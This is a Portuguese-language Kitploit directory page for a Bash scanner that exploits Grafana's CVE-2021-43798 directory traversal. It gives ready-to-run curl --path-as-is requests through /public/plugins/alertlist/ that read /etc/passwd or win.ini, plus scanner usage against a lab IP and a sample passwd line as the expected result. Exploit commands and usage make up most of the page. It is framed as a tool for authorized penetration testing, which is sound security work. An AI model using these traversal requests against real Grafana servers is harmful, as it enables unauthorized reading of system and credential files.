Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Grafana-Plugin-Enumerator-CVE-2021-43798 — Scanner baseado em Bash que enumera IDs de plugins do Grafana e testa a travessia de diretórios da CVE-2021-43798 tentando ler /etc/passwd ou win.ini em instâncias vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/squ1shification/grafana-plugin-enumerator-cve-2021-43798
Scanners de VulnerabilidadesScanners de Vulnerabilidades WebExploraçãoScripting e AutomaçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHub
squ1shification/grafana-plugin-enumerator-cve-2021-43798

Grafana-Plugin-Enumerator-CVE-2021-43798

Scanner baseado em Bash que enumera IDs de plugins do Grafana e testa a travessia de diretórios da CVE-2021-43798 tentando ler /etc/passwd ou win.ini em instâncias vulneráveis.

Ver Repositório
1há 13h 27mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Enumerador de Plugin Grafana CVE-2021-43798

Uma pequena ferramenta baseada em Bash para testar instâncias do Grafana para CVE-2021-43798, uma vulnerabilidade de directory traversal que afeta versões vulneráveis do Grafana.

A ferramenta enumera IDs de plugins do Grafana e usa curl --path-as-is para testar se o directory traversal consegue acessar um arquivo conhecido.

Apenas para testes de segurança autorizados e ambientes de laboratório.

Arquivos

root@kitploit:~
.
├── grafana-windows.sh
├── grafana-linux.sh
├── plugins.txt
└── README.md
  • grafana-windows.sh: Testa o acesso a C:\Windows\win.ini
  • grafana-linux.sh: Testa o acesso a /etc/passwd
  • plugins.txt: Uma wordlist contendo IDs de plugins do Grafana usados durante a enumeração.

Requisitos

  • Bash
  • curl
  • Um alvo Grafana
  • Permissão para testar o alvo

Verifique se o curl está instalado:

root@kitploit:~
curl --version

Torne os scripts executáveis:

root@kitploit:~
chmod +x grafana-windows.sh
chmod +x grafana-linux.sh

Visão Geral do CVE-2021-43798

CVE-2021-43798 é uma vulnerabilidade de directory traversal no Grafana.

O endpoint vulnerável é baseado em: /public/plugins/<plugin-id>/

A vulnerabilidade pode permitir traversal para fora do diretório de plugins pretendido.

A parte importante ao testar com curl é: --path-as-is

Sem esta opção, o cliente pode normalizar o caminho antes de enviá-lo ao servidor.

Scanner Windows

O scanner Windows tenta recuperar: C:\Windows\win.ini

O caminho é representado na requisição HTTP como: Windows/win.ini

Uso Básico

root@kitploit:~
./grafana-windows.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

Exemplo:

root@kitploit:~
./grafana-windows.sh -u http://TARGET:3000 -w plugins.txt

Teste Manual no Windows

Você pode testar um plugin manualmente com:

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

Para o alvo do laboratório:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

Uma resposta bem-sucedida deve conter o conteúdo do arquivo INI do Windows.

Scanner Linux

O scanner Linux tenta recuperar: /etc/passwd

Uso Básico

root@kitploit:~
./grafana-linux.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

Exemplo genérico:

root@kitploit:~
./grafana-linux.sh -u http://TARGET:3000 -w plugins.txt

Teste Manual no Linux

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

Para o alvo do laboratório:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

Uma resposta bem-sucedida no Linux deve conter entradas semelhantes a:

root@kitploit:~
root:x:0:0:root:/root:/bin/bash

Opções de Linha de Comando

Ambos os scanners usam os mesmos argumentos básicos:

  • u, --url : URL base do Grafana
  • w, --wordlist : Wordlist de plugins
  • f, --file : Arquivo a testar
  • h, --help : Mostrar ajuda
Baixar ferramenta